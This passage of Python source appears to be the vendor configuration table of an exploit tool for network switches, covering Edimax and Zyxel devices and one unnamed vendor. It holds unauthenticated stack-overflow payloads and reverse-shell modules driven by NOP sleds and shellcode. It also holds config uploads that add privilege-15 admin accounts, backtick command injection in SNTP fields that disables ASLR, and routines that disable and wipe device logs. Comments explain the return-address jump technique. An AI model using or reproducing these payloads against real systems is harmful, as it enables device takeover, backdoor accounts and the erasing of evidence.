True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse 
shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# Most probably it is vulnerable\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'',\t\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; 
cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x00,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x00,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# 
Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x00,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x00,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x00,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Edimax': { \r\n\t\t\t\t'vendor': 'EDIMAX Technology Co., 
Ltd.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 
+'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Zyxel': {\r\n\t\t\t\t'vendor': 'Zyxel Communications 
Corp.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from heap overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': 